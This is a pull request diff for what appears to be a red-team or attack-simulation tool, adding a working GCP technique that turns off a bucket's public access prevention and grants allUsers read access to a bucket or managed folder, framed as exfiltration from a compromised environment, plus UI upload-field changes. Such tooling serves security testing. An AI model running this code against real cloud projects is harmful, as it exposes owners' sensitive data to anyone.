### PR TITLE
feat : Add new attack technique and improve the upload field for the attack technique parameter

### DIFF
--- a/attack_techniques/__init__.py
+++ b/attack_techniques/__init__.py
@@ -120,3 +120,4 @@ from .gcp.gcp_enumerate_cloud_storage_objects import GCPEnumerateCloudStorageObj
 from .gcp.gcp_exfilterate_cloud_storage_objects import GCPExfilStorageBuckets
 from .gcp.gcp_enumerate_compute_engine_instances import GCPEnumerateComputeEngineInstances
 from .gcp.gcp_persistence_via_ssh_key_addition import GCPPersistenceViaSSHKeyAddition
+from .gcp.gcp_expose_public_cloud_storage import GCPExposePublicCloudStorage

--- a/attack_techniques/gcp/gcp_establish_access_as_sa.py
+++ b/attack_techniques/gcp/gcp_establish_access_as_sa.py
@@ -1,4 +1,4 @@
-from ..base_technique import BaseTechnique, ExecutionStatus, MitreTechnique
+from ..base_technique import BaseTechnique, ExecutionStatus, MitreTechnique, TechniqueReference
 from ..technique_registry import TechniqueRegistry
 from typing import Dict, Any, Tuple
 import json
@@ -19,7 +19,12 @@ class GCPEstablishAccessAsServiceAccount(BaseTechnique):
                 sub_technique_name="Cloud Accounts"
             )
         ]
-        super().__init__("Establish Access As Service Account", "Establishes access to Google Cloud Platform as service account", mitre_techniques)
+
+        technique_references = [
+            TechniqueReference(ref_title = "Service accounts overview", ref_link = "https://cloud.google.com/iam/docs/understanding-service-accounts")
+        ]
+
+        super().__init__("Establish Access As Service Account", "Establish access to Google Cloud Platform using compromised or obtained service account credentials. This technique enables authentication as legitimate GCP service accounts, bypassing traditional user-based authentication mechanisms. The technique accepts service account JSON key files which contain the necessary cryptographic material for authentication including private keys, client information, and token endpoints. Once access is established, you inherit all IAM permissions and roles associated with the compromised service account, enabling privilege escalation and lateral movement within the GCP environment. The technique validates credential integrity, checks for expiration, and can optionally save credentials for persistent access across multiple attack operations.", mitre_techniques=mitre_techniques, references=technique_references)
 
     def execute(self, **kwargs: Any) -> Tuple[ExecutionStatus, Dict[str, Any]]:
         self.validate_parameters(kwargs)

--- a/attack_techniques/gcp/gcp_establish_access_as_sa.py
+++ b/attack_techniques/gcp/gcp_establish_access_as_sa.py
@@ -107,7 +107,7 @@ class GCPEstablishAccessAsServiceAccount(BaseTechnique):
 
     def get_parameters(self) -> Dict[str, Dict[str, Any]]:
         return {
-            "credential": {"type": "str", "required": True, "default": None, "name": "JSON Credential", "input_field_type" : "upload"},
+            "credential": {"type": "str", "required": True, "default": None, "name": "JSON Credential", "input_field_type" : "upload", "multiple_files": False, "file_type": ".json"},
             "name": {"type": "str", "required": True, "default": None, "name": "Name", "input_field_type" : "text"},
             "save_and_activate": {"type": "bool", "required": False, "default": False, "name": "Save and Activate?", "input_field_type" : "bool"}
         }

--- a/attack_techniques/gcp/gcp_establish_access_as_sa.py
+++ b/attack_techniques/gcp/gcp_establish_access_as_sa.py
@@ -107,7 +107,7 @@ class GCPEstablishAccessAsServiceAccount(BaseTechnique):
 
     def get_parameters(self) -> Dict[str, Dict[str, Any]]:
         return {
-            "credential": {"type": "str", "required": True, "default": None, "name": "JSON Credential", "input_field_type" : "upload", "multiple_files": False, "file_type": ".json"},
+            "credential": {"type": "str", "required": True, "default": None, "name": "Credential Key JSON", "input_field_type" : "upload", "multiple_files": False, "file_type": ".json"},
             "name": {"type": "str", "required": True, "default": None, "name": "Name", "input_field_type" : "text"},
-            "save_and_activate": {"type": "bool", "required": False, "default": False, "name": "Save and Activate?", "input_field_type" : "bool"}
+            "save_and_activate": {"type": "bool", "required": False, "default": True, "name": "Save and Activate?", "input_field_type" : "bool"}
         }

--- a/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
+++ b/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
@@ -24,10 +24,14 @@ class GCPExposePublicCloudStorage(BaseTechnique):
                 sub_technique_name=None
             )
         ]
+        technique_references = [
+            TechniqueReference(ref_title = "GCP - Make data public", ref_link = "https://cloud.google.com/storage/docs/access-control/making-data-public")
+        ]
         super().__init__(
             name="Expose Public Cloud Storage",
-            description="This module attempts to enable public read access to a Google Cloud Storage bucket by setting the bucket's IAM policy to allow allUsers to read objects.",
+            description="Enable public read access on a Google Cloud Storage bucket by modifying the bucket's IAM policy to allow allUsers to read bucket objects. Optionally, the technique can also expose a specific path within the bucket. This technique is useful for exfiltrating data from a compromised GCP environment. It can be used to make sensitive data publicly accessible, which can lead to data breaches or unauthorized access.",
             mitre_techniques=mitre_techniques,
+            references=technique_references
         )
     def execute(self, **kwargs: Any) -> tuple[ExecutionStatus, dict[str, Any]]:
         self.validate_parameters(kwargs)

--- a/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
+++ b/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
@@ -1,0 +1,107 @@
+import base64
+import json
+from ..base_technique import BaseTechnique, ExecutionStatus, MitreTechnique, TechniqueNote, TechniqueReference
+from ..technique_registry import TechniqueRegistry
+
+from typing import Dict, Any, Tuple, List
+
+from core.gcp.gcp_access import GCPAccess
+from core.Constants import OUTPUT_DIR
+from google.cloud import storage
+from google.cloud.storage.constants import PUBLIC_ACCESS_PREVENTION_INHERITED
+from google.oauth2.service_account import Credentials as ServiceAccountCredentials
+from google.auth.transport.requests import Request
+
+@TechniqueRegistry.register
+class GCPExposePublicCloudStorage(BaseTechnique):
+    def __init__(self):
+        mitre_techniques = [
+            MitreTechnique(
+                technique_id="T1567",
+                technique_name="Exfiltration Over Web Service",
+                tactics=["Exfiltration"],
+                sub_technique_name=None
+            )
+        ]
+        super().__init__(
+            name="Expose Public Cloud Storage",
+            description="This module attempts to enable public read access to a Google Cloud Storage bucket by setting the bucket's IAM policy to allow allUsers to read objects.",
+            mitre_techniques=mitre_techniques,
+        )
+    def execute(self, **kwargs: Any) -> tuple[ExecutionStatus, dict[str, Any]]:
+        self.validate_parameters(kwargs)
+
+        try:
+            bucket_name: str = kwargs.get("bucket_name", None)
+
+            # Input validation
+            if bucket_name in [None, ""]:
+                return ExecutionStatus.FAILURE, {
+                    "error": "Invalid Technique Input",
+                    "message": {"input_required": "Target Bucket Name"}
+                }
+
+            # Create storage client using current credentials
+            manager = GCPAccess()
+            current_access = manager.get_current_access()
+            loaded_credential = json.loads(base64.b64decode(current_access["credential"]))
+            scopes = [
+                "https://www.googleapis.com/auth/devstorage.full_control"
+            ]
+            request = Request()
+            credential = ServiceAccountCredentials.from_service_account_info(loaded_credential, scopes=scopes)
+            credential.refresh(request=request)
+            storage_client = storage.Client(credentials=credential)
+
+            # Get the bucket
+            bucket = storage_client.get_bucket(bucket_name)
+            if not bucket.exists():
+                return ExecutionStatus.FAILURE, {
+                    "error": f"Bucket {bucket_name} does not exist",
+                    "message": f"Failed to access bucket {bucket_name}"
+                }
+            
+            if bucket.iam_configuration.public_access_prevention == "enforced":
+                bucket.iam_configuration.public_access_prevention = (PUBLIC_ACCESS_PREVENTION_INHERITED)
+                bucket.patch()
+
+
+            # Check if the bucket is already public
+            # Set the IAM policy to allow public read access
+            policy = bucket.get_iam_policy(requested_policy_version=3)
+            policy.bindings.append({
+                "role": "roles/storage.objectViewer",
+                "members": {"allUsers"}
+            })
+            bucket.set_iam_policy(policy)
+            return ExecutionStatus.SUCCESS, {
+                "message": f"Successfully exposed GCP bucket {bucket_name} public",
+                "value": {
+                    "bucket_name": bucket_name,
+                    "path": f"gs://{bucket_name}"
+                }
+        }
+
+        except Exception as e:
+            return ExecutionStatus.FAILURE, {
+                "error": str(e),
+                "message": "Technique Execution Failed"
+            }
+
+    def get_parameters(self) -> Dict[str, Dict[str, Any]]:
+        return {
+            "bucket_name": {
+                "type": "str",
+                "required": True,
+                "default": None,
+                "name": "Bucket Name",
+                "input_field_type": "text"
+            },
+            "path": {
+                "type": "str",
+                "required": False,
+                "default": None,
+                "name": "Path",
+                "input_field_type": "text"
+            }
+        }

--- a/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
+++ b/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
@@ -1,5 +1,9 @@
 import base64
+from email import message
 import json
+import re
+import requests
+from os import access, name, path
 from ..base_technique import BaseTechnique, ExecutionStatus, MitreTechnique, TechniqueNote, TechniqueReference
 from ..technique_registry import TechniqueRegistry
 
@@ -7,10 +11,11 @@ from typing import Dict, Any, Tuple, List
 
 from core.gcp.gcp_access import GCPAccess
 from core.Constants import OUTPUT_DIR
-from google.cloud import storage
+from google.cloud import storage, storage_control_v2
 from google.cloud.storage.constants import PUBLIC_ACCESS_PREVENTION_INHERITED
 from google.oauth2.service_account import Credentials as ServiceAccountCredentials
 from google.auth.transport.requests import Request
+import google.api_core.exceptions
 
 @TechniqueRegistry.register
 class GCPExposePublicCloudStorage(BaseTechnique):
@@ -30,17 +35,15 @@ class GCPExposePublicCloudStorage(BaseTechnique):
         )
     def execute(self, **kwargs: Any) -> tuple[ExecutionStatus, dict[str, Any]]:
         self.validate_parameters(kwargs)
-
         try:
             bucket_name: str = kwargs.get("bucket_name", None)
-
+            path: str = kwargs.get("path", None)
             # Input validation
             if bucket_name in [None, ""]:
                 return ExecutionStatus.FAILURE, {
                     "error": "Invalid Technique Input",
                     "message": {"input_required": "Target Bucket Name"}
                 }
-
             # Create storage client using current credentials
             manager = GCPAccess()
             current_access = manager.get_current_access()
@@ -51,6 +54,7 @@ class GCPExposePublicCloudStorage(BaseTechnique):
             request = Request()
             credential = ServiceAccountCredentials.from_service_account_info(loaded_credential, scopes=scopes)
             credential.refresh(request=request)
+            access_token = credential.token
             storage_client = storage.Client(credentials=credential)
 
             # Get the bucket
@@ -60,32 +64,84 @@ class GCPExposePublicCloudStorage(BaseTechnique):
                     "error": f"Bucket {bucket_name} does not exist",
                     "message": f"Failed to access bucket {bucket_name}"
                 }
-            
+            # Check if path is provided, if not set it to the entire bucket
             if bucket.iam_configuration.public_access_prevention == "enforced":
                 bucket.iam_configuration.public_access_prevention = (PUBLIC_ACCESS_PREVENTION_INHERITED)
                 bucket.patch()
 
 
-            # Check if the bucket is already public
-            # Set the IAM policy to allow public read access
-            policy = bucket.get_iam_policy(requested_policy_version=3)
-            policy.bindings.append({
-                "role": "roles/storage.objectViewer",
-                "members": {"allUsers"}
-            })
-            bucket.set_iam_policy(policy)
-            return ExecutionStatus.SUCCESS, {
-                "message": f"Successfully exposed GCP bucket {bucket_name} public",
-                "value": {
-                    "bucket_name": bucket_name,
-                    "path": f"gs://{bucket_name}"
+            if path is None or path == "":
+                # Set the IAM policy to allow public read access on bucket level
+                policy = bucket.get_iam_policy(requested_policy_version=3)
+                policy.bindings.append({
+                    "role": "roles/storage.objectViewer",
+                    "members": ["allUsers"]
+                })
+                bucket.set_iam_policy(policy)
+                return ExecutionStatus.SUCCESS, {
+                    "message": f"Successfully exposed GCP bucket {bucket_name} public",
+                    "value": {
+                        "bucket_name": bucket_name,
+                        "path": f"gs://{bucket_name}"
+                    }
                 }
-        }
+            else:
+                storage_control_client = storage_control_v2.StorageControlClient(credentials=credential)
+                project_path = storage_control_client.common_project_path("_")    
+                bucket_path = f"{project_path}/buckets/{bucket_name}"
+
+                # Check if the path is a managed folder
+                request = storage_control_v2.GetManagedFolderRequest(
+                    name=f"{bucket_path}/managedFolders/{path}"
+                )
+                try:
+                    managed_folder = storage_control_client.get_managed_folder(request=request)
+                except google.api_core.exceptions.NotFound:
+                    managed_folder = None
+                
+                # If the managed folder does not exist, create it
+                if managed_folder is None:
+                    request = storage_control_v2.CreateManagedFolderRequest(
+                        parent=bucket_path,
+                        managed_folder_id=path,
+                    )
+                    managed_folder = storage_control_client.create_managed_folder(request=request)
+                
+                # Set Headers for IAM policy update 
+                headers = {
+                    "Authorization": f"Bearer {access_token}",
+                    "Content-Type": "application/json"
+                }
+                # Set the IAM policy to allow public read access on the managed folder
+                iam_binding = {
+                    "bindings":[
+                            {
+                            "role": "roles/storage.objectViewer",
+                            "members":["allUsers"]
+                            }
+                        ]
+                    }
+                json_data = json.dumps(iam_binding).encode('utf-8')
+                url = f"https://storage.googleapis.com/storage/v1/b/{bucket_name}/managedFolders/{path}/iam"
+                response = requests.put(url, data=json_data, headers=headers)
+                response.raise_for_status()  # Raise an exception for HTTP errors (4xx or 5xx)
+
+                
+                
+                # managed_folder = storage_control_client.create_managed_folder(request=request)
+                return ExecutionStatus.SUCCESS, {
+                    "message": f"Successfully exposed GCP bucket {bucket_name} public on path {path}",
+                    "value": {
+                        "bucket_name": bucket_name,
+                        "path": f"gs://{bucket_name}/{path}"
+                    }
+                }
+
 
         except Exception as e:
             return ExecutionStatus.FAILURE, {
                 "error": str(e),
-                "message": "Technique Execution Failed"
+                "message": "Failed to expose GCP bucket to public",
             }
 
     def get_parameters(self) -> Dict[str, Dict[str, Any]]:

--- a/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
+++ b/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
@@ -78,11 +78,13 @@ class GCPExposePublicCloudStorage(BaseTechnique):
                     "members": ["allUsers"]
                 })
                 bucket.set_iam_policy(policy)
+                
                 return ExecutionStatus.SUCCESS, {
                     "message": f"Successfully exposed GCP bucket {bucket_name} public",
                     "value": {
                         "bucket_name": bucket_name,
-                        "path": f"gs://{bucket_name}"
+                        "path": f"gs://{bucket_name}",
+                        "new_bucket_policy": policy.bindings
                     }
                 }
             else:
@@ -125,15 +127,14 @@ class GCPExposePublicCloudStorage(BaseTechnique):
                 url = f"https://storage.googleapis.com/storage/v1/b/{bucket_name}/managedFolders/{path}/iam"
                 response = requests.put(url, data=json_data, headers=headers)
                 response.raise_for_status()  # Raise an exception for HTTP errors (4xx or 5xx)
-
-                
                 
                 # managed_folder = storage_control_client.create_managed_folder(request=request)
                 return ExecutionStatus.SUCCESS, {
                     "message": f"Successfully exposed GCP bucket {bucket_name} public on path {path}",
                     "value": {
                         "bucket_name": bucket_name,
-                        "path": f"gs://{bucket_name}/{path}"
+                        "path": f"gs://{bucket_name}/{path}",
+                        "new_policy_attached_to_path": response.json().get("bindings", [])
                     }
                 }
 

--- a/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
+++ b/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
@@ -156,7 +156,7 @@ class GCPExposePublicCloudStorage(BaseTechnique):
                 "type": "str",
                 "required": False,
                 "default": None,
-                "name": "Object Path in Bucket",
+                "name": "Object Path in Bucket (Optional)",
                 "input_field_type": "text"
             }
         }

--- a/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
+++ b/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
@@ -84,6 +84,8 @@ class GCPExposePublicCloudStorage(BaseTechnique):
                     }
                 }
             else:
+                # santize path
+                path = path.strip("/")
                 storage_control_client = storage_control_v2.StorageControlClient(credentials=credential)
                 project_path = storage_control_client.common_project_path("_")    
                 bucket_path = f"{project_path}/buckets/{bucket_name}"
@@ -147,14 +149,14 @@ class GCPExposePublicCloudStorage(BaseTechnique):
                 "type": "str",
                 "required": True,
                 "default": None,
-                "name": "Bucket Name",
+                "name": "Target Bucket Name",
                 "input_field_type": "text"
             },
             "path": {
                 "type": "str",
                 "required": False,
                 "default": None,
-                "name": "Path",
+                "name": "Object Path in Bucket",
                 "input_field_type": "text"
             }
         }

--- a/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
+++ b/attack_techniques/gcp/gcp_expose_public_cloud_storage.py
@@ -1,16 +1,12 @@
 import base64
-from email import message
 import json
-import re
 import requests
-from os import access, name, path
 from ..base_technique import BaseTechnique, ExecutionStatus, MitreTechnique, TechniqueNote, TechniqueReference
 from ..technique_registry import TechniqueRegistry
 
-from typing import Dict, Any, Tuple, List
+from typing import Dict, Any
 
 from core.gcp.gcp_access import GCPAccess
-from core.Constants import OUTPUT_DIR
 from google.cloud import storage, storage_control_v2
 from google.cloud.storage.constants import PUBLIC_ACCESS_PREVENTION_INHERITED
 from google.oauth2.service_account import Credentials as ServiceAccountCredentials

--- a/core/Functions.py
+++ b/core/Functions.py
@@ -1045,9 +1045,15 @@ def generate_attack_technique_config(technique):
                             children=html.Div([
                                 html.Div([
                                     html.I(className="fas fa-cloud-upload-alt", style={"fontSize": "2rem", "color": "#6c757d", "marginBottom": "8px"}),
-                                    html.Div("Drop files here or click to upload", style={"fontSize": "0.9rem", "fontWeight": "600"}),
-                                    html.Small("Drag and drop or click to select files", className="text-muted")
-                                ], className="text-center")
+                                    html.Small("Drag and drop or click to select files", className="text-muted"),
+                                    html.I(id="technique-config-display-file-name", style={"marginTop": "8px", "color": "#fff", "fontSize": "0.85rem"})
+                                ], 
+                                style={
+                                    "display": "flex",
+                                    "flexDirection": "column",
+                                    "alignItems": "center",
+                                    "justifyContent": "center"
+                                }, className="text-center"),
                             ], className="enhanced-upload-area"),
                             className="enhanced-file-upload",
                             style={
@@ -1063,7 +1069,9 @@ def generate_attack_technique_config(technique):
                                 'cursor': 'pointer',
                                 'position': 'relative',
                                 'overflow': 'hidden'
-                            }
+                            },
+                            multiple = input_config.get("multiple_files", False),
+                            accept = input_config.get("file_type", "*/*")
                         )
                     ]) if input_config['input_field_type'] == "upload" else html.Div()
                     

--- a/pages/attack.py
+++ b/pages/attack.py
@@ -473,7 +473,28 @@ def display_attack_technique_config_callback(technique):
     technique_config = generate_attack_technique_config(technique)
     return technique_config
 
-'''Callback to execute a technqiue'''
+'''Callback to display selected filename in technique config'''
+
+@callback(
+    Output(component_id = "technique-config-display-file-name", component_property = "children"),
+    Input({"type": "technique-config-display-file-upload", "index": ALL}, "filename")
+)
+def display_uploaded_file_names(filenames):
+    if filenames[0] == None:
+        return "No file(s) selected"
+    # If multiple files are selected for one upload, join them with commas
+    result = []
+    for fn in filenames:
+        if not fn:
+            result.append("")
+        elif isinstance(fn, list):
+            result.append(", ".join(fn))
+        else:
+            result.append(fn)
+    
+    return f"Selected files: {', '.join(result)}" 
+
+'''Callback to execute a technique'''
 @callback(
         Output(component_id = "execution-output-div", component_property = "children"), 
         Output(component_id = "app-notification", component_property = "is_open", allow_duplicate=True), 

--- a/requirements.txt
+++ b/requirements.txt
@@ -174,3 +174,4 @@ dotenv==0.9.9
 tiktoken==0.9.0
 pycountry==24.6.1
 google-api-python-client==2.118.0
+google-cloud-storage-control==1.6.0


### PR DESCRIPTION
# feat : Add new attack technique and improve the upload field for the attack technique parameter

## Related issue
Issue #73 

## Changelog
- Added `GCPExposePublicCloudStorage` attack technique to expose Google Cloud Storage to the public on the bucket and managed folder level:
  Note: For managed-folder level, still using REST API due to the limitation of Google Cloud Python SDK: Service Control v2
- Added configuration for upload input type to:
  - Allow single or multiple files by specifying the `multiple_files` field using the `get_parameters` method of an attack technique.
  - Allow specific or all file types by specifying the `file_type` field using the `get_parameters` method of an attack technique.
- Improve `GCPEstablishAccessAsServiceAccount` to follow upload field improvements.
  